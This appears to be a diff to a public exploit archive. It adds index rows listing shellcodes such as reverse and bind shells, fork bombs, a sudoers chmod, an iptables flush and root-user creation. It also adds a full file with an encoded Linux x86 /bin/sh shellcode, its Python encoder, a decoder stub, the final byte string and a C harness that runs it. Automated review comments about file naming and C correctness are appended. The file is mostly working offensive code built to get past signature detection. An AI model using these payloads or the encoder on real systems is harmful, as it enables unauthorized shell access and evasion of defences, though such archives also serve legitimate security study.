787 41581 shellcodes/windows_x86/41581.c Windows/x86 - Hide Console Window Shellcode (182 bytes) 2017-03-11 Ege Balci shellcode windows_x86
788 43433 shellcodes/linux_x86/43433.c Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes) 2018-01-05 Nipun Jaswal shellcode linux_x86
789 43476 shellcodes/linux_x86/43476.c Linux/x86 - execve(/bin/dash) Shellcode (30 bytes) 2018-01-10 Hashim Jawad shellcode linux_x86
793 43483 shellcodes/bsd_x86/43483.c BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes) 2009-01-01 Jihyeog Lim shellcode bsd_x86
794 43489 shellcodes/linux_x86/43489.c Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes) 2018-01-10 Debashis Pal shellcode linux_x86
795 43497 shellcodes/arm/43497.asm Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes) 2018-01-11 Azeria shellcode arm
796 43502 shellcodes/freebsd_x86-64/43502.txt FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes) FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes) 2009-01-01 Gitsnik shellcode freebsd_x86-64
797 43503 shellcodes/freebsd_x86-64/43503.txt FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes) FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes) 2009-01-11 Gitsnik shellcode freebsd_x86-64
798 43504 shellcodes/freebsd_x86/43504.asm FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes) 2009-01-01 Tosh shellcode freebsd_x86
799 43505 shellcodes/freebsd_x86/43505.c FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes) 2009-01-01 antrhacks shellcode freebsd_x86
800 43506 shellcodes/freebsd_x86/43506.c FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes) 2009-01-01 zillion shellcode freebsd_x86
818 43541 shellcodes/superh_sh4/43541.c Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes) 2011-06-22 Florian Gaultier shellcode superh_sh4
819 43542 shellcodes/superh_sh4/43542.c Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes) 2009-01-01 Dad_ shellcode superh_sh4
820 43546 shellcodes/linux_sparc/43546.c Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes) 2009-01-01 Michel Kaempf shellcode linux_sparc
821 43549 shellcodes/linux_x86-64/43549.c Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes) Linux/x64 - Execute /bin/sh Shellcode (27 bytes) 2009-01-01 Dad_ shellcode linux_x86-64
822 43550 shellcodes/linux_x86-64/43550.c Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes) Linux/x64 - Execute /bin/sh Shellcode (24 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
823 43551 shellcodes/linux_x86-64/43551.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) 2014-10-29 Osanda Malith Jayathissa shellcode linux_x86-64
824 43552 shellcodes/linux_x86-64/43552.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
825 43553 shellcodes/linux_x86-64/43553.c Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
826 43554 shellcodes/linux_x86-64/43554.c Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes) Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes) 2009-01-01 Doreth.Z10 shellcode linux_x86-64
827 43555 shellcodes/linux_x86-64/43555.c Linux/x86-64 - shutdown -h now Shellcode (65 bytes) Linux/x64 - shutdown -h now Shellcode (65 bytes) 2014-06-27 Osanda Malith Jayathissa shellcode linux_x86-64
828 43556 shellcodes/linux_x86-64/43556.asm Linux/x86-64 - shutdown -h now Shellcode (64 bytes) Linux/x64 - shutdown -h now Shellcode (64 bytes) 2014-09-14 Keyman shellcode linux_x86-64
829 43557 shellcodes/linux_x86-64/43557.asm Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) 2014-09-14 Keyman shellcode linux_x86-64
830 43558 shellcodes/linux_x86-64/43558.asm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) 2014-09-04 Keyman shellcode linux_x86-64
831 43559 shellcodes/linux_x86-64/43559.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) 2014-09-03 Keyman shellcode linux_x86-64
832 43561 shellcodes/linux_x86-64/43561.asm Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) 2014-09-21 Keyman shellcode linux_x86-64
833 41630 shellcodes/linux_x86/41630.asm Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes) 2017-03-17 WangYihang shellcode linux_x86
834 41631 shellcodes/linux_x86/41631.c Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes) 2017-03-17 Oleg Boytsev shellcode linux_x86
835 41635 shellcodes/linux_x86/41635.txt Linux/x86 - Read /etc/passwd Shellcode (54 bytes) 2017-03-19 WangYihang shellcode linux_x86
836 43734 shellcodes/linux_x86/43734.c Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
837 42295 shellcodes/linux_x86/42295.c Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
838 41723 shellcodes/linux_x86/41723.c Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes) 2017-03-24 JR0ch17 shellcode linux_x86
839 41750 shellcodes/linux_x86-64/41750.txt shellcodes/linux_x86-64/41750.asm Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) 2017-03-28 WangYihang shellcode linux_x86-64
840 41757 shellcodes/linux_x86/41757.txt Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4) 2017-03-29 WangYihang shellcode linux_x86
841 41827 shellcodes/windows_x86-64/41827.txt shellcodes/windows_x86-64/41827.asm Windows/x86-64 (10) - Egghunter Shellcode (45 bytes) Windows/x64 (10) - Egghunter Shellcode (45 bytes) 2017-04-06 Peter Baris shellcode windows_x86-64
842 41883 shellcodes/linux_x86-64/41883.txt Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2) Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2) 2017-04-13 WangYihang shellcode linux_x86-64
843 41909 shellcodes/linux_x86/41909.c Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes) 2017-04-22 phackt_ul shellcode linux_x86
844 41969 shellcodes/linux_x86/41969.c Linux/x86 - Disable ASLR Security Shellcode (80 bytes) 2017-05-08 abatchy17 shellcode linux_x86
845 41970 shellcodes/linux_x86-64/41970.asm Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) 2017-05-08 Srakai shellcode linux_x86-64
846 42016 shellcodes/windows/42016.asm Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes) Windows - cmd.exe Shellcode (718 bytes) 2017-05-17 Filippo Bersani shellcode windows
847 42126 shellcodes/linux_x86-64/42126.c Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1) Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1) 2017-06-05 Touhid M.Shaikh shellcode linux_x86-64
848 42177 shellcodes/linux_x86/42177.c Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes) 2017-06-15 nullparasite shellcode linux_x86
849 42179 shellcodes/linux_x86-64/42179.c Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes) Linux/x64 - execve(/bin/sh) Shellcode (24 bytes) 2017-06-15 m4n3dw0lf shellcode linux_x86-64
850 42208 shellcodes/linux_x86/42208.nasm Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes) 2017-06-20 DONTON Fetenat C shellcode linux_x86
851 42254 shellcodes/linux_x86/42254.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes) 2017-06-26 wetw0rk shellcode linux_x86
852 42339 shellcodes/linux_x86-64/42339.c Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) 2017-07-19 m4n3dw0lf shellcode linux_x86-64
853 42428 shellcodes/linux_x86/42428.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4) 2017-08-06 Touhid M.Shaikh shellcode linux_x86
854 42485 shellcodes/linux_x86-64/42485.c Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) 2017-08-17 Touhid M.Shaikh shellcode linux_x86-64
855 42522 shellcodes/linux_x86-64/42522.c Linux/x86-64 - Kill All Processes Shellcode (19 bytes) Linux/x64 - Kill All Processes Shellcode (19 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
856 42523 shellcodes/linux_x86-64/42523.c Linux/x86-64 - Fork Bomb Shellcode (11 bytes) Linux/x64 - Fork Bomb Shellcode (11 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
857 42594 shellcodes/linux_x86/42594.c Linux/x86 - Fork Bomb Shellcode (9 bytes) 2017-08-30 Touhid M.Shaikh shellcode linux_x86
858 42646 shellcodes/arm/42646.c Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes) 2017-09-10 Andrea Sindoni shellcode arm
859 42647 shellcodes/arm/42647.c Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes) 2017-09-10 Andrea Sindoni shellcode arm
860 42791 shellcodes/linux_x86-64/42791.c Linux/x86-64 - mkdir(evil) Shellcode (30 bytes) Linux/x64 - mkdir(evil) Shellcode (30 bytes) 2017-09-25 Touhid M.Shaikh shellcode linux_x86-64
861 42977 shellcodes/linux_x86/42977.c Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes) 2017-10-12 Manuel Mancera shellcode linux_x86
862 42992 shellcodes/windows_x86-64/42992.c Windows/x86-64 - API Hooking Shellcode (117 bytes) Windows/x64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode windows_x86-64
863 43463 shellcodes/linux_x86/43463.nasm Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) 2018-01-04 Hashim Jawad shellcode linux_x86
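
Review bot: row 786 keeps the path `shellcodes/linux_x86-64/41510.nsam`, while every other NASM source in this listing uses the `.nasm` extension. This change is already normalising titles, so rename the file and fix the path in the same pass; otherwise anything that selects sources by extension will skip it. The title on row 833 also still reads `exceve(/bin/sh)`, which will not match a search for `execve`.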


@ -0,0 +1,172 @@
/*
#################################### Description ####################################
; Title : [ROT-N + Shift-N + XOR-N] encoded /bin/sh - Shellcode
; Author : Hashim Jawad
; Blog Post : https://ihack4falafel.com/2018/01/rot-n-shift-n-xor-n-shellcode-encoder-linux-x86/
; Twitter : @ihack4falafel
; SLAE ID : SLAE-1115
; Purpose : spawn /bin/sh shell
; Tested On : Ubuntu 12.04.5 LTS
; Arch : x86
; Size : 77 bytes
##################################### sh.nasm ######################################
global _start
section .text
_start:
;
; execve() code block
;
xor eax,eax ; initiliaze EAX
push eax ; push null terminator
push 0x68732f2f ; push /bin//sh
push 0x6e69622f
xchg ebx,esp ; save stack pointer to EBX
mov al,0xb ; __NR_execve 11
int 0x80 ; ping kernel!
############################# Original Shellcode ####################################
ihack4falafel@ubuntu:~$ nasm -f elf32 -o sh.o sh.nasm
ihack4falafel@ubuntu:~$ ld -z execstack -o sh sh.o
ihack4falafel@ubuntu:~$ objdump -d ./sh|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80"
################################# Encoder.py #####################################
#!/usr/bin/python
import sys
# Colors
#---------------#---------#
W = '\033[0m' # White #
P = '\033[35m' # Purple #
Y = '\033[33m' # Yellow #
#---------------#---------#
# Check ROT, SHL, and XOR input, otherwise print usage, example, and important notes!
if len(sys.argv) < 4:
print Y+ "Usage :" + P+ " python Encoder.py <ROT number> <number of bits to shift> <XOR number> " +W
print Y+ "Example :" + P+ " python Encoder.py 13 1 1337 " +W
print Y+ "Notes :" + P+ " 1) Make sure to update Decoder.nasm with input values. " +W
print " " + P+ " 2) Due to encoded_shellcode size (word) in Decoder.nasm, shift operatio" +W
print " " + P+ " n is limited to <1-8> bits. Feel free to upgrade size to DW to allow" +W
print " " + P+ " up to 16-bits shift operation. " +W
print " " + P+ " 3) Encoder.py currently include /bin/sh shellcode as proof of concept. " +W
print " " + P+ " Make sure to change it to your desired shellcode. " +W
sys.exit(0)
ROT = int(sys.argv[1])
nbits = int(sys.argv[2])
XOR = int(sys.argv[3])
# initial values
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80") # paste your shellcode here
XOR_HEX = hex(XOR) # Encoded shellcode terminator
encoded_shellcode = ""
original_shellcode = ""
# Orginal shellcode formatted
for x in bytearray(shellcode):
original_shellcode += '0x'
original_shellcode += '%02x, ' %x
# [ROT-N + SHL-N + XOR-N] encoded shellcode formatted
for y in bytearray(shellcode):
byte = (y + ROT)%256 #|-->ROT-N
byte = byte << nbits #########|-->SHL-N
byte = byte ^ XOR #################|-->XOR-N
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %byte
# print original and encoded shellcode
print Y+ "Original Shellcode: " + P+ original_shellcode +W
print Y+ "Encoded Shellcode : " + P+ encoded_shellcode + Y+ XOR_HEX +W
#################################### Encoded Shellcode ##########################################
ihack4falafel@ubuntu:~$ python Encoder.py 13 1 1337
Original Shellcode: 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x87, 0xdc, 0xb0, 0x0b, 0xcd, 0x80,
Encoded Shellcode : 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539
ihack4falafel@ubuntu:~$
#################################### Decoder.nasm ###############################################
global _start
section .text
_start:
;
; [ROT-N + SHL-N + XOR-N] encoded execve() code block
;
jmp short call_decoder ; jump to call_decoder to save encoded_shellcode pointer to ESI
decoder:
pop esi ; store encoded_shellcode pointer in ESI
push esi ; push encoded_shellcode pointer to stack for later execution
mov edi, esi ; move encoded_shellcode pointer to EDI
decode:
;
; note: 1) Make sure ROT, SHR, and XOR here match your encoder.py input.
; 2) Hence we're limited by the size of encoded_shellcode (word),
; SHR is limited to <1-8> bits. Feel free to upgrade size to DW
; to allow up to 16-bits shift if need be.
;
mov ax, [esi] ; move current word from encoded_shellcode to AX
xor ax, 0x539 ; XOR encoded_shellcode with 1337, one word at a time
jz decoded_shellcode ; if zero jump to decoded_shellcode
shr ax, 1 ; shift encoded_shellcode to right by one bit, one word at a time
sub ax, 13 ; substract 13 from encoded_shellcode, one word at a time
mov [edi], al ; move decoded byte to EDI
inc esi ; point to the next encoded_shellcode word
inc esi
inc edi ; point to the next decoded_shellcode byte
jmp short decode ; jump to decode and repeat the decoding process for the next word!
decoded_shellcode:
call [esp] ; execute decoded_shellcode
call_decoder:
call decoder
encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539
######################################### Final Shellcode ###########################################
ihack4falafel@ubuntu:~# nasm -f elf32 -o Decoder.o Decoder.nasm
ihack4falafel@ubuntu:~# ld -z execstack -o Decoder Decoder.o
ihack4falafel@ubuntu:~# objdump -d ./Decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x1e\x5e\x56\x89\xf7\x66\x8b\x06\x66\x35\x39\x05\x74\x0e\x66\xd1\xe8\x66\x83\xe8\x0d\x88\x07\x46\x46\x47\xeb\xe9\xff\x14\x24\xe8\xdd\xff\xff\xff\x45\x05\xa3\x04\x83\x05\xd3\x05\x41\x05\x41\x05\x39\x04\xd3\x05\xd3\x05\x41\x05\xe7\x05\xd5\x05\xcf\x05\x11\x04\xeb\x04\x43\x04\x09\x05\x8d\x04\x23\x04\x39\x05"
ihack4falafel@ubuntu:~# gcc -fno-stack-protector -z execstack sh.c -o sh
ihack4falafel@ubuntu:~$ ./sh
Shellcode Length: 77
$ whoami
ihack4falafel
$
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x1e\x5e\x56\x89\xf7\x66\x8b\x06\x66\x35\x39\x05\x74\x0e\x66\xd1\xe8\x66\x83\xe8\x0d\x88\x07\x46\x46\x47\xeb\xe9\xff\x14\x24\xe8\xdd\xff\xff\xff\x45\x05\xa3\x04\x83\x05\xd3\x05\x41\x05\x41\x05\x39\x04\xd3\x05\xd3\x05\x41\x05\xe7\x05\xd5\x05\xcf\x05\x11\x04\xeb\x04\x43\x04\x09\x05\x8d\x04\x23\x04\x39\x05";
void main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
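
Review bot: in the C harness at the end of the file, `printf("Shellcode Length: %d\n", strlen(code));` passes a `size_t` to `%d` and an `unsigned char *` to `strlen`, and `void main()` is not a standard signature. Use `%zu` with a `(char *)` cast, or `sizeof(code) - 1`, which also stays correct if the array ever contains a zero byte, and declare `int main(void)`. In the header notes, the advice to "upgrade size to DW" for wider shifts is confusing because `encoded_shellcode` is already declared with `dw` and read through `ax`; state which directive and register width are actually meant.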